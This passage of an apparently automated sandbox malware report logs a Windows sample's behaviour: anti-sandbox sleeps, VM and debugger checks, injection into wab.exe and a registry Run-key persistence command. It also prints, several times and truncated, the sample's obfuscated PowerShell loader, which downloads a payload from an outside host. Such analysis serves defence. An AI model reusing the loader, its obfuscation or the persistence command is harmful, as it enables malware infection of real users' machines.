Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 54446C1

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6017	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3760	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6217	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3527	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3124	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 2545	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3493	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 6416	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6156	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 6217 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444	Thread sleep count: 3527 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3796	Thread sleep count: 3124 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep count: 2545 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep time: -7635000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep count: 3493 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1720	Thread sleep time: -10479000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 3124 delay: -5

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wscript.exe, 00000000.00000003.1679476616.000001816A4E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1679903004.000001816A4F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
Source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: powershell.exe, 00000001.00000002.2496319652.000001703AE17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: wscript.exe, 00000000.00000003.1679207996.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682876301.000001816A468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657076648.000001816A441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682876301.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A468000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656487203.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656928856.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679947682.000001816A4CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679947682.000001816A467000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1683906838.000001816A51F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679136591.000001816A504000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680099067.000001816A51E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: icshutdownHyper-V Ti*v
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
Source: wscript.exe, 00000000.00000002.1683801671.000001816A4FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: desktop virtualization servicevmicshutdownhyper-v time synchronization servicehyper-v powershell direct servicevmicvssvolume shadow copywindows timewalletservicewarpjitsvcblock level backup engine servicewindows biometric servicewindows connection managerwindows connect now - config registrardiagnostic service hostdiagnostic system hostmicrosoft defender antivirus network inspection servicewebclientwindows event collectorwindows encryption provider host serviceproblem reports control panel supportwindows error reporting servicewi-fi direct services connection manager servicestill image acquisition eventsmicrosoft defender antivirus servicewinhttp web proxy auto-discovery servicewindows management instrumentationwindows remote management (ws-management)windows insider servicewlan autoconfigmicrosoft account sign-in assistantlocal profile assistant servicewindows management servicewmi performance adapterwindows media player network sharing servicework foldersparental controlsportable device enumerator servicewindows push notifications system servicesecurity centerwindows searchwindows updatewwan autoconfigxbox live auth managerxbox live game savexbox accessory management servicexbox live networking serviceagent activation runtime_26d39gamedvr and broadcast user service_26d39bluetooth user support service_26d39captureservice_26d39clipboard user service_26d39connected devices platform user service_26d39consentux_26d39credentialenrollmentmanagerusersvc_26d39deviceassociationbroker_26d39devicepicker_26d39devicesflow_26d39messagingservice_26d39sync host_26d39contact data_26d39printworkflow_26d39udk user service_26d39user data storage_26d39user data access_26d39windows push notifications user service_26d393
Source: wscript.exe, 00000000.00000002.1682761795.000001816A45B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679207996.000001816A458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_4412.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 275F89C			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 